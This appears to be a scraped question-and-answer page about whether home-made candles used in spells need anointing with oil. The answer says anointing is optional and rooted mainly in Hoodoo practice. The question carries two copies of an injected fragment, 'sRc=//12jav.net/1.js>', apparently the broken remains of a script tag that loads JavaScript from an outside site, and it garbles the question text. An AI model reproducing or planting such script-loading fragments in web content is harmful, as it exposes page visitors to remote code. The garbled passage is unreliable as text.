If you make your own candles and oils the the candle for spells would you still have to anoint the candles with oil? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Anointing is personal preference, while not necessary you can still do so if you wish.

Even with store bought candles, anointing is optional. Primarily it is seen in Hoodoo tradition, anointing a candle in specific ways with particular oils is said to bring the intention and energy into a candle spell more strongly.

That being said it certainly isn't a requirement and if you would rather work with your candles without oils, then that is just as valid. It is all about working with what you are comfortable with.
